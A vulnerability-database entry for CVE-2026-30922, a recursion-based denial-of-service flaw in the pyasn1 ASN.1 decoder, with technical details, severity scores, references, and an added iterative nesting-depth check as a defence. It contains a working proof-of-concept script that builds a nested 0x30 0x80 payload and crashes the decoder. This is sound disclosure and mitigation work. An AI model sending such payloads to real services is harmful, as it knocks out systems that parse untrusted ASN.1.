Vulnerability details: VCID-kth3-bvbt-gbgk
Vulnerability ID VCID-kth3-bvbt-gbgk
Aliases CVE-2026-30922
GHSA-jr27-m4p2-rc6r
Summary Denial of Service in pyasn1 via Unbounded Recursion

### Summary

The `pyasn1` library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing nested `SEQUENCE` (`0x30`) or `SET` (`0x31`) tags with Indefinite Length (`0x80`) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a `RecursionError` or consumes all available memory (OOM), crashing the host application.

### Details

The vulnerability exists because the decoder iterates through the input stream and recursively calls `decodeFun` (the decoding callback) for every nested component found, without tracking or limiting the recursion depth.

Vulnerable code locations:

1. `indefLenValueDecoder` (line 998):
   ```python
   for component in decodeFun(substrate, asn1Spec, allowEoo=True, **options):
   ```
   This method handles indefinite-length constructed types. It sits inside a `while True` loop and recursively calls the decoder for every nested tag.

2. `valueDecoder` (lines 786 and 907):
   ```python
   for component in decodeFun(substrate, componentType, **options):
   ```
   This method handles standard decoding when a schema is present. It contains two distinct recursive calls that lack depth checks:
   - Line 786: recursively decodes components of `SEQUENCE` or `SET` types.
   - Line 907: recursively decodes elements of `SEQUENCE OF` or `SET OF` types.

3. `_decodeComponentsSchemaless` (line 661):
   ```python
   for component in decodeFun(substrate, **options):
   ```
   This method handles decoding when no schema is provided.

In all three cases, `decodeFun` is invoked without passing a `depth` parameter or checking against a global `MAX_ASN1_NESTING` limit.

### PoC

```python
import sys
from pyasn1.codec.ber import decoder

sys.setrecursionlimit(100000)

print("[*] Generating Recursion Bomb Payload...")
depth = 50_000
chunk = b'\x30\x80'
payload = chunk * depth
print(f"[*] Payload size: {len(payload) / 1024:.2f} KB")

print("[*] Triggering Decoder...")
try:
    decoder.decode(payload)
except RecursionError:
    print("[!] Crashed: Recursion Limit Hit")
except MemoryError:
    print("[!] Crashed: Out of Memory")
except Exception as e:
    print(f"[!] Crashed: {e}")
```

```
[*] Payload size: 9.77 KB
[*] Triggering Decoder...
[!] Crashed: Recursion Limit Hit
```

### Impact

- This is an unhandled runtime exception that typically terminates the worker process or thread handling the request. This allows a remote attacker to trivially kill service workers with a small payload (<100KB), resulting in a Denial of Service. Furthermore, in environments where recursion limits are increased, this leads to server-wide memory exhaustion.
- Service Crash: Any service using `pyasn1` to parse untrusted ASN.1 data (e.g., LDAP, SNMP, Kerberos, X.509 parsers) can be crashed remotely.
- Resource Exhaustion: The attack consumes RAM linearly with the nesting depth. A small payload (<200KB) can consume hundreds of megabytes of RAM or exhaust the stack.

### Credits

Vulnerability discovered by Kevin Tu of TMIR at ByteDance.
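The durable remediation is the upstream fix (the pyasn1 commits and the v0.6.3 release linked in the references below). Where untrusted BER reaches a decoder that cannot yet be upgraded, a boundary check that bounds nesting depth before decoding is the defensive counterpart to the recursion described above. The following is an added example written for this page, not code from the advisory or from the pyasn1 project: it walks BER tag/length headers with an explicit stack instead of recursion, so its own stack usage is constant, and it rejects a payload as soon as the nesting exceeds a caller-chosen limit (after `max_depth + 1` headers, not after the whole payload). It handles definite-length, long-form and indefinite-length (`0x80`) headers, end-of-contents octets, and truncated input. The function names, the `max_depth` default of 64, and the sample inputs are all assumptions; the `0x30 0x80` nesting pattern is the one the advisory describes.

```python
"""Iterative BER nesting-depth pre-check (added example; not pyasn1 code)."""
from __future__ import annotations


class MalformedBER(ValueError):
    """Not a well-formed BER TLV stream (truncated, bad length, stray EOC)."""


class NestingTooDeep(ValueError):
    """Constructed values are nested deeper than the caller's limit."""


def _skip_identifier(data: bytes, pos: int) -> tuple[bool, int]:
    """Return (is_constructed, position after the identifier octets)."""
    first = data[pos]
    constructed = bool(first & 0x20)  # bit 6 of the identifier octet
    pos += 1
    if first & 0x1F == 0x1F:  # high-tag-number form: octets continue while bit 8 is set
        while True:
            if pos >= len(data):
                raise MalformedBER("truncated identifier")
            pos += 1
            if not data[pos - 1] & 0x80:
                break
    return constructed, pos


def _read_length(data: bytes, pos: int) -> tuple[int | None, int]:
    """Return (length, position after the length octets); None means indefinite (0x80)."""
    if pos >= len(data):
        raise MalformedBER("truncated length")
    first = data[pos]
    pos += 1
    if first < 0x80:
        return first, pos
    if first == 0x80:
        return None, pos
    if first == 0xFF:
        raise MalformedBER("reserved length octet 0xFF")
    count = first & 0x7F
    if pos + count > len(data):
        raise MalformedBER("truncated long-form length")
    return int.from_bytes(data[pos:pos + count], "big"), pos + count


def check_nesting_depth(data: bytes, max_depth: int = 64) -> int:
    """Return the deepest constructed nesting in data, or raise.

    NestingTooDeep is raised the moment a constructed value would exceed
    max_depth; MalformedBER for truncated or inconsistent encodings.
    """
    n = len(data)
    pos = 0
    frames: list[int | None] = []  # end offset per open constructed value; None = indefinite
    deepest = 0
    while pos < n or frames:
        # Close definite-length frames whose contents have been fully consumed.
        while frames and frames[-1] is not None and pos >= frames[-1]:
            if pos > frames[-1]:
                raise MalformedBER("child value overruns its parent")
            frames.pop()
        if pos >= n:
            if frames:
                raise MalformedBER("unterminated indefinite-length value")
            break
        if data[pos] == 0x00:  # end-of-contents octets close an indefinite-length value
            if not frames or frames[-1] is not None:
                raise MalformedBER("end-of-contents outside an indefinite-length value")
            if pos + 1 >= n or data[pos + 1] != 0x00:
                raise MalformedBER("bad end-of-contents octets")
            frames.pop()
            pos += 2
            continue
        constructed, pos = _skip_identifier(data, pos)
        length, pos = _read_length(data, pos)
        if constructed:
            depth = len(frames) + 1
            if depth > max_depth:
                raise NestingTooDeep(f"nesting exceeds {max_depth}")
            deepest = max(deepest, depth)
            if length is None:
                frames.append(None)
                continue
        elif length is None:
            raise MalformedBER("primitive value with indefinite length")
        end = pos + length
        if end > n or (frames and frames[-1] is not None and end > frames[-1]):
            raise MalformedBER("length runs past the enclosing value")
        if constructed:
            frames.append(end)
        else:
            pos = end
    return deepest


def safe_to_decode(data: bytes, max_depth: int = 64) -> bool:
    """Boundary check to run on untrusted bytes before handing them to a decoder."""
    try:
        check_nesting_depth(data, max_depth)
    except ValueError:  # covers both MalformedBER and NestingTooDeep
        return False
    return True


# Constructed sample inputs (assumptions for this example, not data from the advisory).
BENIGN_DEFINITE = bytes.fromhex("3008 020105 3003 020101")  # SEQUENCE { INTEGER 5, SEQUENCE { INTEGER 1 } }
BENIGN_INDEFINITE = bytes.fromhex("3080 020105 0000")        # SEQUENCE (indefinite) { INTEGER 5 }
DEEP_BUT_VALID = b"\x30\x80" * 200 + b"\x00\x00" * 200      # 200 properly terminated levels
UNTERMINATED_NEST = b"\x30\x80" * 2000                       # the advisory's 0x30 0x80 pattern, no EOC
```

`check_nesting_depth` reports the real depth so a deployment can pick a limit from observed traffic, while `safe_to_decode` collapses both "too deep" and "malformed" into a reject decision, which is the right granularity at a network boundary; log the exception message separately if you need to tell the two apart. The limit only bounds nesting: it does not validate tags against a schema, and it should sit beside, not replace, the upstream patch.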
Status Published
Exploitability 0.5
Weighted Severity 8.0
Risk 4.0
Affected and Fixed Packages Package Details
Weaknesses (4)
System Score Found at
cvssv3 7.5 https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-30922.json
epss 0.00049 https://api.first.org/data/v1/epss?cve=CVE-2026-30922
epss 0.00054 https://api.first.org/data/v1/epss?cve=CVE-2026-30922
epss 0.00073 https://api.first.org/data/v1/epss?cve=CVE-2026-30922
cvssv3.1 7.5 https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
cvssv3.1_qr HIGH https://github.com/advisories/GHSA-jr27-m4p2-rc6r
cvssv3.1 7.5 https://github.com/pyasn1/pyasn1
generic_textual HIGH https://github.com/pyasn1/pyasn1
cvssv3.1 7.5 https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0
generic_textual HIGH https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0
ssvc Track https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0
cvssv3.1 7.5 https://github.com/pyasn1/pyasn1/commit/5a49bd1fe93b5b866a1210f6bf0a3924f21572c8
generic_textual HIGH https://github.com/pyasn1/pyasn1/commit/5a49bd1fe93b5b866a1210f6bf0a3924f21572c8
cvssv3.1 7.5 https://github.com/pyasn1/pyasn1/releases/tag/v0.6.3
generic_textual HIGH https://github.com/pyasn1/pyasn1/releases/tag/v0.6.3
cvssv3.1 7.5 https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r
cvssv3.1_qr HIGH https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r
generic_textual HIGH https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r
ssvc Track https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r
cvssv3.1 7.5 https://nvd.nist.gov/vuln/detail/CVE-2026-30922
generic_textual HIGH https://nvd.nist.gov/vuln/detail/CVE-2026-30922
cvssv3.1 7.5 http://www.openwall.com/lists/oss-security/2026/03/20/4
generic_textual HIGH http://www.openwall.com/lists/oss-security/2026/03/20/4
Reference id Reference type URL
https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-30922.json
https://api.first.org/data/v1/epss?cve=CVE-2026-30922
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-30922
https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
https://github.com/pyasn1/pyasn1
https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0
https://github.com/pyasn1/pyasn1/commit/5a49bd1fe93b5b866a1210f6bf0a3924f21572c8
https://github.com/pyasn1/pyasn1/releases/tag/v0.6.3
https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r
https://lists.debian.org/debian-lts-announce/2026/05/msg00001.html
https://nvd.nist.gov/vuln/detail/CVE-2026-30922
http://www.openwall.com/lists/oss-security/2026/03/20/4
1131371 https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1131371
2448553 https://bugzilla.redhat.com/show_bug.cgi?id=2448553
GHSA-jr27-m4p2-rc6r https://github.com/advisories/GHSA-jr27-m4p2-rc6r
RHSA-2026:10184 https://access.redhat.com/errata/RHSA-2026:10184
RHSA-2026:12176 https://access.redhat.com/errata/RHSA-2026:12176
RHSA-2026:6309 https://access.redhat.com/errata/RHSA-2026:6309
RHSA-2026:6404 https://access.redhat.com/errata/RHSA-2026:6404
RHSA-2026:6568 https://access.redhat.com/errata/RHSA-2026:6568
RHSA-2026:6720 https://access.redhat.com/errata/RHSA-2026:6720
RHSA-2026:6912 https://access.redhat.com/errata/RHSA-2026:6912
RHSA-2026:6926 https://access.redhat.com/errata/RHSA-2026:6926
RHSA-2026:8437 https://access.redhat.com/errata/RHSA-2026:8437
USN-8129-1 https://usn.ubuntu.com/8129-1/
USN-8134-1 https://usn.ubuntu.com/8134-1/
No exploits are available.
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-30922.json
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at https://github.com/pyasn1/pyasn1
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0
Vector: SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-18T20:16:18Z/ Found at https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at https://github.com/pyasn1/pyasn1/commit/5a49bd1fe93b5b866a1210f6bf0a3924f21572c8
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at https://github.com/pyasn1/pyasn1/releases/tag/v0.6.3
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r
Vector: SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-18T20:16:18Z/ Found at https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at https://nvd.nist.gov/vuln/detail/CVE-2026-30922
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at http://www.openwall.com/lists/oss-security/2026/03/20/4
Exploit Prediction Scoring System (EPSS)
Percentile 0.15359
EPSS Score 0.00049
Published At April 2, 2026, 12:55 p.m.
Date Actor Action Source VulnerableCode Version
2026-04-01T12:54:01.505385+00:00 GithubOSV Importer Import https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-jr27-m4p2-rc6r/GHSA-jr27-m4p2-rc6r.json 38.0.0